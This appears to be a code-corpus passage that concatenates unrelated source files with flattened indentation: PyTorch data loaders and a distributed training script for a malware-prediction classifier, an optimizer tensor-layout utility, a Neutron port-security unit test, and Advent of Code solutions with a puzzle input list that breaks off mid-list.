solutions = gen_SimPleAC_radar(marray, methods, objectives, keyOrder, baseobj)
# Tabulating data
[data, maxesindata, minsindata] = generate_radar_data(solutions, objectives, keyOrder, baseobj)
# Storing in csv
baseresult = data[1][1][0] # result for fuel burn for comparison
objective_table_csv(objectives, data, keyOrder, baseresult)
# Drawing solutions
count = 0
for sol in solutions:
SimPleAC_draw(sol[0], color='blue', directory = 'objectiveTableResults', name='objtable'+str(count))
count += 1
``` |
{
"source": "1p4pk/SusML",
"score": 3
} |
#### File: malware_prediction/eval/dataset_test.py
```python
import pandas as pd
import torch
from torch.utils import data
class MalwareTestDataset(data.Dataset):
def __init__(self, tensor_path, csv_path):
self.X = torch.load(tensor_path)
self.id = pd.read_csv(csv_path)['MachineIdentifier'].values
self.rows = self.X.shape[0]
def __len__(self):
return len(self.X)
def __getitem__(self, index):
return self.X[index], self.id[index]
```
#### File: malware_prediction/train/dataset_train.py
```python
import torch
from torch.utils import data
class MalwareTrainDataset(data.Dataset):
def __init__(self, train_data_path, label_data_path):
self.X = torch.load(train_data_path)
self.y = torch.load(label_data_path)
self.rows = self.X.shape[0]
self.cols = self.X.shape[1]
def __len__(self):
return len(self.X)
def __getitem__(self, index):
return self.X[index], self.y[index]
```
#### File: malware_prediction/train/main_model.py
```python
import os
import socket
import sys
from torch import distributed as dist
from torch import nn
from torch import optim
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.data.dataloader import DataLoader
from .dataset_train import MalwareTrainDataset
from .model import MalwarePredictor
from .train import ModelTrainer
from ..benchmark import timeit, memory_monitor, cpu_monitor, disk_monitor
SIZE = int(os.environ['OMPI_COMM_WORLD_SIZE'])
RANK = int(os.environ['OMPI_COMM_WORLD_RANK'])
HOSTNAME = socket.gethostname()
# LABEL_DATA_PATH = f'./data/tensor/label_data_{RANK}.pt'
# TRAIN_DATA_PATH = f'./data/tensor/train_data_{RANK}.pt'
LABEL_DATA_PATH = f'./data/tensor/label_data.pt'
TRAIN_DATA_PATH = f'./data/tensor/train_data.pt'
OPTIMIZER = sys.argv[2]
LOSS_FUNCTION = sys.argv[3]
MODEL_PATH = f"./models/model_{OPTIMIZER}_{LOSS_FUNCTION}.pb"
@cpu_monitor(file_name="model")
@memory_monitor(file_name="model")
@disk_monitor(file_name="model")
@timeit(file_name="model")
def run(backend='mpi'):
""" Initialize the distributed environment. """
print(f"Running rank {RANK} of {SIZE} on {HOSTNAME}")
print("Load Data")
dist.init_process_group(backend)
dataset = MalwareTrainDataset(TRAIN_DATA_PATH, LABEL_DATA_PATH)
loader = DataLoader(dataset, batch_size=100)
model = DDP(MalwarePredictor(loader.dataset.cols, 100, 100, 1))
loss = get_loss(LOSS_FUNCTION)
optimizer = get_optimizer(OPTIMIZER, model.parameters())
print("Model prepared.")
print("Process group initialized.")
trainer = ModelTrainer(loader, model, loss, optimizer, MODEL_PATH)
print("Trainer initialized.")
trainer.train(15, verbose=True)
print("Done training.")
dist.destroy_process_group()
def get_optimizer(optimizer: str, parameters):
optimizer = optimizer.lower()
if optimizer == "sgd":
return optim.SGD(parameters, lr=0.01)
elif optimizer == "adagrad":
return optim.Adagrad(parameters, lr=0.01)
elif optimizer == "adam":
return optim.Adam(parameters, lr=0.001)
elif optimizer == "adamw":
return optim.AdamW(parameters, lr=0.001)
elif optimizer == "asgd":
return optim.ASGD(parameters, lr=0.01)
def get_loss(loss: str):
loss = loss.lower()
if loss == "mseloss":
return nn.MSELoss()
elif loss == "bceloss":
return nn.BCELoss()
if __name__ == '__main__':
run()
``` |
{
"source": "1pikachu/examples",
"score": 2
} |
#### File: examples/imagenet/optimizer_util.py
```python
import torch
def to_dense(optim):
for param in optim.state.values():
# Not sure there are any global tensors in the state dict
if isinstance(param, torch.Tensor) and param.layout is torch._mkldnn:
param.data = param.data.to_dense()
if param._grad is not None:
param._grad.data = param._grad.data.to_dense()
elif isinstance(param, dict):
for subparam in param.values():
if isinstance(subparam, torch.Tensor) and subparam.layout is torch._mkldnn:
subparam.data = subparam.data.to_dense()
if subparam._grad is not None:
subparam._grad.data = subparam._grad.data.to_dense()
def to_mkldnn(optim):
for param in optim.state.values():
if isinstance(param, torch.Tensor) and param.dtype == torch.float32:
param.data = param.data.to_mkldnn()
if param._grad is not None:
param._grad.data = param._grad.data.to_mkldnn()
elif isinstance(param, dict):
for subparam in param.values():
if isinstance(subparam, torch.Tensor) and subparam.dtype == torch.float32:
subparam.data = subparam.data.to_mkldnn()
if subparam._grad is not None:
subparam._grad.data = subparam._grad.data.to_mkldnn()
``` |
{
"source": "1pintbeer/neutron",
"score": 2
} |
#### File: plugins/ml2/test_ext_portsecurity.py
```python
from neutron_lib.api.definitions import port_security as psec
from neutron_lib import context
from neutron_lib.plugins import directory
from oslo_config import cfg
from neutron.tests.unit.extensions import test_portsecurity as test_psec
from neutron.tests.unit.plugins.ml2 import test_plugin
class PSExtDriverTestCase(test_plugin.Ml2PluginV2TestCase,
test_psec.TestPortSecurity):
_extension_drivers = ['port_security']
def setUp(self):
cfg.CONF.set_override('extension_drivers',
self._extension_drivers,
group='ml2')
super(PSExtDriverTestCase, self).setUp()
def test_create_net_port_security_default(self):
_core_plugin = directory.get_plugin()
admin_ctx = context.get_admin_context()
args = {'network':
{'name': 'test',
'tenant_id': '',
'shared': False,
'admin_state_up': True,
'status': 'ACTIVE'}}
try:
network = _core_plugin.create_network(admin_ctx, args)
_value = network[psec.PORTSECURITY]
finally:
if network:
_core_plugin.delete_network(admin_ctx, network['id'])
self.assertEqual(psec.DEFAULT_PORT_SECURITY, _value)
def test_create_port_with_secgroup_none_and_port_security_false(self):
if self._skip_security_group:
self.skipTest("Plugin does not support security groups")
with self.network() as net:
with self.subnet(network=net):
res = self._create_port('json', net['network']['id'],
arg_list=('security_groups',
'port_security_enabled'),
security_groups=[],
port_security_enabled=False)
self.assertEqual(201, res.status_int)
port = self.deserialize('json', res)
self.assertFalse(port['port'][psec.PORTSECURITY])
self.assertEqual([], port['port']['security_groups'])
``` |
{
"source": "1pkg/dump",
"score": 3
} |
#### File: aoc/src/4.py
```python
def check(passw):
prev = ''
adjacent = False
asc = True
for char in passw:
if prev == '':
prev = char
continue
if char == prev:
adjacent = True
if int(char) < int(prev):
asc = False
prev = char
return adjacent and asc
summ = 0
for i in range(382345, 843167):
if check(str(i)):
summ +=1
print(summ)
```
#### File: aoc/src/6.1.py
```python
def parse_orbs(inc):
db = {}
for pair in inc:
(parent, current) = pair.split(')')
db[current] = parent
return db
def traverse_between(inc, node1, node2):
summs = []
db = parse_orbs(inc)
node1len = 0
curren1 = node1
while True:
if curren1 not in db:
break
curren1 = db[curren1]
node1len += 1
node2len = 0
curren2 = node2
while True:
if curren2 not in db:
break
curren2 = db[curren2]
node2len += 1
if curren2 == curren1:
print(curren1, node1len + node2len)
summs.append(node1len + node2len - 2)
break
summs.sort()
return summs
print(traverse_between([
'KWT)W4F',
'TKX)NX9',
'4K2)BRZ',
'6FT)G8R',
'F83)5PC',
'DRJ)8DZ',
'89K)VFY',
'2BT)1M5',
'19Z)DRJ',
'YVX)S7H',
'7L1)PVG',
'NSS)GJ8',
'XTK)85X',
'63D)V7T',
'RTP)D27',
'1JM)VV1',
'9KT)3F7',
'K9C)X1S',
'VS3)FSR',
'9N5)5LX',
'C4F)KP1',
'WNX)YG3',
'FXY)2ND',
'VGF)Y7M',
'BTD)4VJ',
'JSC)H7Q',
'VL5)1RW',
'8PL)FMY',
'D27)KYC',
'M71)CB3',
'93X)Y2S',
'KVH)65Z',
'PQJ)D6D',
'RVD)FVL',
'SF3)3L5',
'G6V)HYT',
'2SY)PS2',
'D9S)TKX',
'G1W)K7C',
'GD5)KL6',
'F1V)HLT',
'Z2D)DTP',
'TXT)2TZ',
'DGM)4L7',
'91Z)4R4',
'165)LSN',
'LZN)MW4',
'Y5C)3YZ',
'6YW)BL6',
'P31)NV9',
'JB2)5LJ',
'DFJ)5LV',
'STY)GP6',
'9H4)7ND',
'16L)8VF',
'4BF)YRT',
'DWS)GWQ',
'ZDY)X5S',
'P5X)FH1',
'WQ6)KNC',
'PLQ)P7H',
'PVG)4HL',
'21F)TR7',
'GKD)HZR',
'TR9)DDC',
'C46)23G',
'24H)WDX',
'XP7)Y3L',
'WSK)P2M',
'YM4)7DN',
'R9L)J3H',
'2LB)G5L',
'SPM)NVJ',
'KFM)TXT',
'C9H)HPL',
'WGN)9VZ',
'WFZ)7JR',
'SNF)BJG',
'WTF)3KX',
'HG9)HHG',
'Q2R)535',
'513)49V',
'9X6)X8G',
'ZDM)C67',
'ZKL)H8W',
'CXH)DKQ',
'DDF)XT5',
'XPG)CC8',
'119)7RG',
'8J2)D8Q',
'Y3S)BSP',
'Q9W)PKR',
'BVJ)BP2',
'G9S)SPM',
'7KP)RVW',
'RRT)ZZH',
'T14)1YX',
'N1S)22L',
'YVT)TLC',
'DWS)W5Q',
'CWG)M3P',
'HX2)GBG',
'HWP)JCH',
'Y83)7GW',
'5V5)RQV',
'NWQ)1XC',
'KW2)K27',
'9B5)WT4',
'MT6)2LD',
'J96)BSF',
'FMH)8JC',
'TL6)2HP',
'G8D)K7T',
'QBX)ZNV',
'STY)VQ8',
'3YJ)TRP',
'KFM)67Q',
'PKR)8KL',
'9XQ)YXW',
'X4K)59D',
'Z4W)FGS',
'MT7)NG6',
'X3H)2FW',
'4VJ)Q5M',
'4QG)846',
'QJC)Y1L',
'46N)Y3S',
'KKQ)84B',
'V18)47B',
'2QL)VKN',
'662)JV4',
'FP7)1XP',
'KFX)GZV',
'1D3)XDX',
'DTP)V8R',
'P96)FTY',
'CZ7)FXL',
'CST)9HD',
'WY6)NQ3',
'8VN)5C2',
'XGG)T9C',
'L83)RZ7',
'ZP7)CP5',
'C6V)S56',
'MNK)R53',
'5BH)ZJ6',
'BLT)683',
'H2H)2JS',
'QNF)8W1',
'3QD)84Y',
'NG6)238',
'QKY)HHD',
'5MY)1MR',
'419)HGT',
'7TY)VYV',
'TC5)2KB',
'VGH)65G',
'4VL)VHX',
'6XH)PMQ',
'BWP)6K3',
'HB9)G88',
'MCF)YPC',
'PBN)TK7',
'BMS)4X2',
'6K2)PLK',
'3ST)RBF',
'5VP)F16',
'7GW)LWH',
'9Q8)MLW',
'JH8)S4Z',
'CQ4)TC2',
'2KG)55W',
'DV1)F6D',
'WP1)123',
'SGL)WL1',
'N5P)6JJ',
'1M5)YK2',
'NPN)QRN',
'B1Z)PRH',
'WLP)SGC',
'7BC)H5W',
'S4T)19Q',
'RBH)XQZ',
'79H)NT9',
'BP2)2VW',
'FQD)6Y7',
'65G)LT4',
'Q3G)1JY',
'Q68)5QQ',
'LGW)QVZ',
'W2K)C4Z',
'F87)S97',
'SFQ)XPG',
'6W3)NFG',
'ZK8)2R2',
'HZR)N4B',
'ZNV)GFB',
'QKG)XQ7',
'XQT)F8X',
'BX2)P4D',
'5LX)D1B',
'LXT)M8W',
'85X)S82',
'X2G)TMB',
'2LX)MVG',
'9X3)ZDH',
'NM3)Q2R',
'XVS)GBV',
'BWP)Z66',
'YKR)NWR',
'1JY)44H',
'919)JKS',
'FWK)YVX',
'YTM)MQB',
'SX9)B94',
'R3W)QBX',
'9PN)XPX',
'FTY)MVK',
'2KQ)CNW',
'Z5J)W31',
'GBV)QFT',
'QZB)62Y',
'BT3)4BK',
'3F7)QKQ',
'9HD)7MJ',
'NPP)92Q',
'JWV)RMV',
'XZT)SBD',
'1XF)PNB',
'LB5)ZSX',
'2YQ)TBQ',
'KPQ)M65',
'DRJ)5ZS',
'3QL)3RG',
'LZL)N9C',
'PJM)89K',
'F5R)NFF',
'PNB)2BT',
'MZX)NBF',
'DBW)WL4',
'WYK)NRK',
'C4Z)SD7',
'7M8)1HF',
'VCK)MFG',
'9W9)BXJ',
'P2B)7T7',
'5JL)FRT',
'QKQ)GVS',
'Q6S)D9S',
'6SC)VG2',
'4FH)TW4',
'JBL)ZG1',
'QP8)DTX',
'M65)DV1',
'H54)LQ3',
'L1C)64K',
'MVK)HB9',
'TJD)ZP3',
'QL7)5RG',
'QWK)YTT',
'LQY)CHG',
'5BG)12J',
'1HF)Q99',
'ZJ6)Q5V',
'1MR)6TP',
'SVJ)T4Y',
'PRD)BXP',
'1F9)GFJ',
'X1S)9H6',
'RC1)CMZ',
'Y1S)KLK',
'WPB)G95',
'XLL)BQB',
'HGV)PQG',
'VLJ)7L1',
'MQB)3ND',
'4SM)6MX',
'F53)919',
'WV6)XC4',
'4H5)RZB',
'3Y7)YX6',
'PTX)D1M',
'PGY)YPM',
'C7P)G1W',
'HWW)S1T',
'4VJ)N9Z',
'51X)Y83',
'LS4)WDS',
'54Y)R8L',
'2W8)M95',
'G4B)814',
'277)41P',
'MJL)58Q',
'6K3)SGK',
'Z5T)QLH',
'HZL)W5S',
'N5X)7NZ',
'34K)W6F',
'7J9)1N1',
'P4D)MY2',
'QHH)Q6S',
'D8V)Z94',
'N13)QJR',
'X5S)XCS',
'VMK)6WF',
'W6D)YXG',
'LM5)YSB',
'4MR)J2F',
'FQC)N64',
'5MZ)1MZ',
'89Z)B16',
'WGM)46N',
'HHV)5HF',
'GH1)4Y8',
'BD7)2LB',
'LBB)6XH',
'272)P8J',
'CLB)YQT',
'9W5)VKK',
'8MH)X3F',
'S36)HDD',
'LYM)NCH',
'1JK)55M',
'432)8M2',
'4YQ)PQ7',
'JJF)WY6',
'SVM)PLB',
'ZNV)5BS',
'XCS)7ZY',
'S56)TQD',
'FMX)MZB',
'KMH)GHG',
'1XP)R9L',
'42L)YW3',
'R4P)Z8W',
'HQD)3J1',
'BYP)7FJ',
'TTQ)9N5',
'H4M)NWB',
'DSN)1FF',
'3R8)73M',
'RQH)Y9B',
'8PY)GD5',
'DCC)JMN',
'S4Z)2MR',
'VQX)F2R',
'TL6)22K',
'8DD)Y25',
'R1Y)KBT',
'PMQ)6PR',
'8NZ)YOU',
'ZG1)9YR',
'Y17)TG5',
'NFG)GJ6',
'8YD)X4M',
'VCK)C6F',
'Q5X)SPH',
'23V)C9H',
'YJV)X3H',
'QCC)KQW',
'G8R)Z9V',
'429)DH4',
'L1W)RKK',
'PP3)BJX',
'BRB)DFD',
'RXQ)7L9',
'62K)3VC',
'93J)KQ2',
'WT4)DVP',
'VWZ)4SM',
'8TK)32R',
'271)SFV',
'C67)4RS',
'LKT)SX9',
'G5Y)DPG',
'G4M)XDM',
'ZSX)MG2',
'W3X)589',
'YP7)2QL',
'XCD)8Q8',
'T9Z)V1P',
'L33)LY3',
'H9K)NKC',
'MPR)QXD',
'6BD)V5Q',
'MXX)1DV',
'MMT)J1T',
'N64)FNK',
'TQD)JBZ',
'H5W)YYS',
'8SL)LFR',
'VZP)DW5',
'ZBW)F1V',
'CK9)FXS',
'TY9)TQ2',
'NWR)TY3',
'6WF)4S1',
'QGY)9RF',
'R39)MHJ',
'19H)HGV',
'NS2)N13',
'8Y5)HT5',
'QG3)1MG',
'HYT)S26',
'72X)HSX',
'CQ7)5Q4',
'2KL)5HD',
'D8Q)RFH',
'KNJ)YDV',
'PQ7)WVW',
'CBH)Y64',
'4WS)8R5',
'TW4)LGW',
'X37)S7J',
'KH2)HYF',
'RFY)L76',
'DNK)GWF',
'HW9)ZKL',
'LLD)8QF',
'4L7)662',
'MG2)YMK',
'GFQ)24H',
'123)Y8L',
'LPD)7MZ',
'5PC)112',
'ZZW)6BD',
'L4L)KV5',
'VFY)DDF',
'Y1D)4BF',
'3H1)R7V',
'DKQ)S3W',
'TXZ)TTQ',
'4KZ)DSN',
'8R5)HGW',
'4XR)8C7',
'DDY)QQD',
'GRQ)P3P',
'YN8)MLK',
'Y1L)K77',
'Z6F)G87',
'4F1)WP1',
'3RN)2MJ',
'GFJ)NM4',
'P2M)C38',
'MPY)QJC',
'3H2)DZ2',
'SBW)JPD',
'PWZ)B1J',
'6R4)MC6',
'Z94)191',
'BLB)J96',
'N8P)L1W',
'JQC)C11',
'RBQ)QFD',
'4PL)KPQ',
'C3V)4Z1',
'J2M)LZN',
'GXL)B1Z',
'63B)QX2',
'WYD)KDC',
'FLB)RG7',
'DYS)26Z',
'L7Q)9W5',
'DN7)ZBW',
'18W)H2H',
'CHN)V4L',
'ZMG)GKD',
'XC4)L91',
'DKQ)6RJ',
'V2B)93X',
'77K)TD6',
'Y8L)GYD',
'PDM)BGW',
'CXJ)2YQ',
'RTT)7J4',
'1TL)CXH',
'NL4)XLL',
'9NJ)RGB',
'NX9)PYQ',
'2DL)S36',
'L9N)KPC',
'JJ8)VGH',
'58Q)8M4',
'12J)MXR',
'1BG)2W8',
'9N9)9LV',
'TDD)NL4',
'46G)8Z6',
'112)KZ1',
'WF7)19Z',
'H2S)CSJ',
'CNL)1ZK',
'FVD)D5R',
'V8R)H9K',
'11G)CCJ',
'K27)DYS',
'2JS)RP2',
'Y64)ZTY',
'22L)BMS',
'N9T)MFH',
'VKC)Z4J',
'T6R)B1D',
'TG8)HHK',
'GJ6)MT7',
'J7F)1L7',
'CV7)WMC',
'47Q)DNP',
'M13)9BL',
'DYF)VFQ',
'LBP)NPD',
'7KR)72X',
'7MJ)GP1',
'TD6)122',
'3W8)KSK',
'QJR)J9G',
'5PK)MMT',
'YPM)K1D',
'Y5Y)DN7',
'1XC)PLQ',
'PHG)FLB',
'7NZ)DWS',
'F6V)L7Q',
'RQV)YP7',
'8V6)X39',
'H7Q)PQJ',
'NR6)L4L',
'B94)W9G',
'3KG)P2B',
'XDS)4TX',
'6RQ)LWK',
'WBW)63D',
'9NW)P7S',
'YHL)3SK',
'S7G)8P3',
'VYV)KCC',
'W5S)3XT',
'5C2)Q2Y',
'PWP)7BL',
'35W)MPP',
'8DJ)5C1',
'H9T)P9C',
'KCC)Y93',
'6YW)4N1',
'PZN)8PK',
'LWH)Z2S',
'2V6)TPH',
'PMC)NPW',
'C4F)MXX',
'P1J)1M6',
'CNY)QSZ',
'KPS)CNY',
'V2N)KPD',
'NLW)6DY',
'SNF)QJX',
'71H)MPR',
'TNR)KBJ',
'DZW)3VW',
'9YM)F9T',
'QBS)4P4',
'MGS)WZR',
'1T8)F42',
'C6F)R1Y',
'QW6)253',
'8PK)79J',
'S7J)KNJ',
'1YX)CGG',
'NFY)8SN',
'CZK)YZ9',
'6QJ)5LK',
'J9M)3JX',
'RDX)WDZ',
'T2G)7M8',
'43S)QGY',
'DDC)JFC',
'HM4)QLV',
'1FT)1TL',
'XDX)SYG',
'4QS)HW9',
'24H)CHM',
'NS9)3KG',
'STW)52W',
'9RF)H89',
'G75)142',
'WDZ)SJQ',
'599)GD6',
'919)JD4',
'FRT)HZ7',
'JB2)NCV',
'V1P)V2B',
'22J)1F6',
'K53)HT8',
'V2T)JJ8',
'2CJ)111',
'GLD)FDK',
'5SG)1KF',
'KQW)8TR',
'5PK)DBF',
'4P4)8PY',
'PP3)DBW',
'XDQ)2KQ',
'4GY)KMG',
'DPY)GTY',
'N8P)QP1',
'4TX)HWP',
'6GY)PF4',
'SGC)Z5J',
'6MS)TXZ',
'T77)L2Y',
'2D4)2CJ',
'J7R)165',
'CDJ)LXT',
'3YZ)QW8',
'3FK)5ZW',
'HSZ)1CN',
'CNY)5VP',
'ZVK)3FX',
'XS4)CTN',
'XBD)7YV',
'D1M)9VP',
'3X7)Q3G',
'LD5)VFM',
'QVZ)HB3',
'F65)2HZ',
'2ZH)5PB',
'SLX)QNF',
'QD8)MNK',
'JPG)SL8',
'Z2S)TKZ',
'61N)QD8',
'GWF)F53',
'V69)4VL',
'1DV)D43',
'6LR)DGM',
'CJL)CXJ',
'HWY)5SG',
'WQ6)LK1',
'YQV)W1L',
'WH5)MB2',
'RVW)KFM',
'CHM)SLX',
'2KB)HWW',
'H5N)7J9',
'MP8)7RB',
'3TL)JSC',
'MXR)P54',
'CXL)LD5',
'TC2)D87',
'XRR)WRG',
'T5C)47K',
'J4N)CYS',
'945)79H',
'Y9B)YKZ',
'W6W)M71',
'VGF)NPY',
'JKS)P48',
'ZDF)FTK',
'RMD)BZ8',
'4K2)W6D',
'GD5)98Q',
'6RJ)TFM',
'BVZ)T64',
'142)LQY',
'WVW)FF1',
'7BL)7R7',
'Y71)NPN',
'B7R)97R',
'Y8V)XS4',
'94R)6RQ',
'1MG)KVH',
'H3C)97J',
'BL6)2KL',
'LNW)VSR',
'3F4)WQ6',
'53B)7XH',
'873)LGT',
'WLY)L6D',
'V88)8V6',
'RG7)16N',
'238)JPY',
'JJ1)6KF',
'J1T)PBN',
'DK7)QH9',
'V7T)75D',
'YPM)D15',
'C2G)K9C',
'3QL)R6N',
'F6D)NXF',
'H8P)5V5',
'R7V)QSQ',
'LK1)RG8',
'YYS)DYF',
'DPG)LPD',
'589)DZQ',
'2HZ)3WY',
'WCD)1RP',
'VGX)2KS',
'GK5)NS2',
'T5C)THM',
'LCP)LFF',
'FF1)QDM',
'QP1)VPH',
'JG9)71H',
'FDK)YD8',
'D5R)3RN',
'CP5)X2G',
'9VP)ZDY',
'L65)1B3',
'2BY)L8T',
'YZ9)L53',
'2MR)1BW',
'PJM)VK7',
'CKH)7B6',
'MRD)9B5',
'X46)VH5',
'8P3)MCF',
'W5Q)RZM',
'KV7)CXL',
'4V6)21R',
'5Q4)CHN',
'B16)G9S',
'PS2)KFG',
'HT5)J9M',
'4TX)9D3',
'S2J)T5C',
'59Q)SYR',
'7J4)Y8D',
'1CN)94R',
'ZV2)5M2',
'6JJ)SCD',
'PPH)1JK',
'44H)CKH',
'TFM)YCW',
'7FJ)277',
'TX7)JRM',
'WL4)6VB',
'22K)JJ1',
'PYQ)TKJ',
'NYJ)PPT',
'C2F)8H5',
'RBF)CL9',
'8BB)Q1C',
'YSV)L93',
'GR6)4H5',
'TWH)659',
'PQ6)9NJ',
'J2M)TG8',
'1MR)ZJZ',
'VW3)PPY',
'P7H)JB2',
'Z8W)ZDF',
'BZ8)6W3',
'5MG)DQ3',
'FXS)4KZ',
'TKZ)M41',
'TB5)H54',
'QM2)54Y',
'B1J)5D7',
'FNK)H99',
'4QG)NLP',
'YTT)5JL',
'713)Y72',
'YCW)4YM',
'X21)N87',
'MPP)HL9',
'LT4)GNP',
'1MJ)SM1',
'NWB)W4M',
'RT5)TTD',
'97J)C95',
'5PB)PX5',
'CJV)WNX',
'6JG)734',
'9VZ)NQJ',
'4HF)YQX',
'VFM)SKQ',
'1JC)NYJ',
'7RG)6BS',
'9KT)1GZ',
'5HF)HCW',
'9CB)VQX',
'2XV)JWF',
'QN3)FNG',
'1N1)NSS',
'PQ6)14Y',
'DH4)6SC',
'DNK)GXL',
'45N)KFX',
'846)WGM',
'443)PQ6',
'XZM)9PN',
'SGC)233',
'YGJ)HQD',
'1BW)Q5X',
'WV9)BSL',
'BMR)MSW',
'6BF)81L',
'19Q)QM2',
'JX4)XP7',
'17G)KPY',
'5C1)16L',
'JG2)DK8',
'R53)Y4H',
'S1T)9H4',
'ZHP)3F4',
'2FP)NC6',
'QG3)6MW',
'6DY)NJ9',
'4L6)D8V',
'PWH)SBW',
'8YK)5HX',
'KW7)4GQ',
'SW7)2D4',
'7P1)JG9',
'ZTT)ZPR',
'GVS)HKG',
'Y71)WHJ',
'1GZ)X46',
'QDM)FBM',
'NX6)MPY',
'NGB)2DL',
'6JG)279',
'T5H)RHT',
'6S4)9PQ',
'NWW)2ZH',
'P5X)X21',
'W3Z)BLB',
'PLB)XTK',
'QSQ)LYY',
'NWB)ZV2',
'2R2)ZVK',
'7XP)KXY',
'PPT)P2L',
'LW1)J3X',
'PWP)61N',
'9VX)Z16',
'VPH)Z6S',
'G9S)V88',
'PR2)ZHQ',
'2N4)YPY',
'HGW)599',
'Z5Z)RC1',
'9N5)CW7',
'726)3ST',
'3SK)5MZ',
'BKR)TWB',
'5Y4)YHR',
'CWY)52X',
'21R)V2N',
'ML8)P1J',
'G4F)6YW',
'F1V)18W',
'VL5)FVY',
'XDS)BF9',
'NT9)W2Z',
'17W)M7J',
'1NJ)862',
'RBF)V2T',
'KTL)VZP',
'71F)XVS',
'CYS)T46',
'9TY)ZDM',
'R4M)Y1D',
'64K)WX7',
'S3W)XBV',
'1Q3)8DD',
'H3V)454',
'HL9)8XN',
'KBJ)T9Z',
'RSF)L38',
'819)JT2',
'TK7)MTZ',
'VK7)HK3',
'HVJ)KV7',
'VBJ)WH5',
'NQ3)DK7',
'YXW)FZ1',
'7R7)8HY',
'5M6)S4T',
'77D)4DC',
'8Q8)DKN',
'GKL)GRQ',
'FZ1)CDJ',
'LQ3)YX5',
'HG3)2XK',
'1B3)Y8V',
'QW8)4QS',
'GD8)6KB',
'JWF)YVT',
'2FW)63R',
'NPS)97X',
'MLW)CWG',
'63R)WT2',
'L66)W2K',
'BJX)TXW',
'TC5)L65',
'GBV)KN7',
'1RP)YN3',
'PX5)NW1',
'X39)GN6',
'DJQ)7QS',
'TNR)XBX',
'QFT)9KT',
'7L9)SNM',
'XT5)MK1',
'31D)X7Y',
'NX6)26R',
'24S)YSV',
'DZQ)TX7',
'F48)4V6',
'L21)9HC',
'MVB)5X5',
'KQ2)6XW',
'Y7D)5G4',
'2XK)PPH',
'3XV)WB7',
'H99)TFK',
'YXG)TL2',
'9BL)JPG',
'L6D)D39',
'SYG)FQC',
'2ND)T2G',
'9X4)8WS',
'3KX)Y81',
'7M9)MJK',
'KXY)P8Z',
'454)9Q8',
'LT2)TDV',
'FVW)FJ5',
'TF7)9PH',
'RHT)6BF',
'MPY)YS9',
'NSS)J5N',
'Y8X)JBQ',
'HHG)4YQ',
'G88)DX7',
'1H9)R25',
'RZ7)LH1',
'NV9)55X',
'8DZ)RVD',
'4KW)TR9',
'Y9G)QDK',
'J2C)DJQ',
'VLB)CCX',
'H8W)PDM',
'HHD)5Y4',
'M9T)Z4W',
'26R)9CB',
'B1D)BXX',
'YWH)CXG',
'TDK)JGY',
'LH1)Y71',
'49V)FXC',
'NRC)BD7',
'N4B)L83',
'253)G4B',
'V5J)19H',
'GLD)JQC',
'73M)5FV',
'HQ3)YHL',
'T46)2NS',
'CW7)2YD',
'HMB)QG3',
'DNP)RDX',
'ZS8)BXK',
'91G)HVJ',
'62M)8VN',
'2VW)PWZ',
'39H)CBH',
'Z6W)6HQ',
'G95)SHK',
'1FF)DX9',
'8HY)8PL',
'8RK)3FV',
'9G5)ZHP',
'B24)XZ5',
'YSB)NWW',
'GVQ)H36',
'YDV)JJF',
'RBB)45N',
'KJK)NX6',
'16N)LYM',
'3VC)17W',
'XYN)CJV',
'JBZ)7KB',
'NM4)YKR',
'GYD)91Z',
'FNG)YJV',
'RZM)TS9',
'MSW)7BH',
'NPY)VQZ',
'NCZ)BKM',
'8H5)C48',
'CL4)7S3',
'6PR)71M',
'PLK)2FP',
'TXW)713',
'NC6)6TM',
'VYZ)XHS',
'WB7)CWY',
'WX7)WF8',
'ZD8)726',
'KS5)QXZ',
'YDW)BVZ',
'KNC)THZ',
'GWQ)GH4',
'9DF)LQB',
'J3H)QHC',
'1ZJ)WFZ',
'WT2)CFW',
'X7Y)9MV',
'GD6)H9R',
'C64)GVQ',
'P2L)KWT',
'K53)JBL',
'7T7)9NW',
'RD5)1MJ',
'TKJ)82P',
'MW4)2DD',
'KVH)WF7',
'MFH)3QL',
'BF9)L34',
'CXJ)87W',
'CPS)Z4L',
'959)38Z',
'Y3L)L7R',
'2YD)T6R',
'NL3)BLT',
'68C)13Y',
'SGM)N5P',
'J2F)SAN',
'Z4J)RXQ',
'6BS)PWH',
'3Y7)31K',
'58B)9N9',
'DTP)C7P',
'38Z)1D3',
'5DV)Q26',
'C95)LM5',
'QSQ)KPS',
'SJQ)QHH',
'8QF)7M9',
'4DC)4MR',
'LSN)H5Q',
'Z83)N11',
'R4G)6MS',
'BP2)4QG',
'47K)PWP',
'F3L)2LM',
'MB3)BRB',
'PPY)DLQ',
'K1D)DZW',
'DLQ)S4K',
'8C7)DPZ',
'GN6)3TL',
'Q57)3FT',
'Q99)63B',
'ZHQ)MGS',
'59D)PHG',
'111)LT2',
'JGY)V69',
'BGW)4PL',
'HT5)11G',
'PX8)HM4',
'CGG)5PK',
'DDF)2SY',
'ZZH)RZ3',
'1LW)SGM',
'S7G)RT5',
'YQF)LB5',
'GP6)8MH',
'7ND)B5L',
'Z66)2C6',
'N1C)DFJ',
'6ZY)VS3',
'P45)5F8',
'V4L)PRD',
'Q56)JX4',
'5HX)RSF',
'FJ5)7CW',
'HK8)1CZ',
'LFF)5CB',
'HT8)8DJ',
'Z6S)QKY',
'GHG)KFD',
'C3C)4K2',
'K7T)5NQ',
'7MZ)P5X',
'3Q2)K72',
'MB2)N1S',
'ZJZ)DYY',
'YG3)LYL',
'T1Y)JSP',
'FHZ)KR6',
'G5Y)6PF',
'NPW)745',
'ZBP)CPC',
'3RG)4QJ',
'HSX)85G',
'TTD)P45',
'RZB)4DS',
'Y4H)478',
'Q5M)9GK',
'G5L)ZJP',
'FXL)WLY',
'8G6)C2G',
'X9R)YQ9',
'FMY)1NJ',
'VH5)77D',
'PF4)CQ7',
'FVY)TWH',
'535)77K',
'F9Q)FXY',
'SBD)L4W',
'QCM)V5J',
'M42)XMH',
'77K)R3W',
'WL1)CL4',
'RFH)XCL',
'3MV)HMB',
'X96)9HT',
'32R)KW7',
'J5N)1T8',
'GJG)C64',
'P2B)J2M',
'13Y)ZZW',
'TDK)3H1',
'X7L)4J9',
'BQB)1DJ',
'PN4)FMH',
'TL3)1LW',
'23S)Z83',
'J34)3X7',
'4QJ)Q68',
'DHD)QTM',
'9FX)PNN',
'CT5)HG9',
'CB3)16K',
'N9Z)6J3',
'SXJ)1LL',
'JSW)ZS8',
'BXP)1H6',
'BSL)9X4',
'5N1)NFH',
'K77)WYN',
'443)4L6',
'8ND)2R8',
'6J3)HHV',
'W7Z)272',
'L83)WTF',
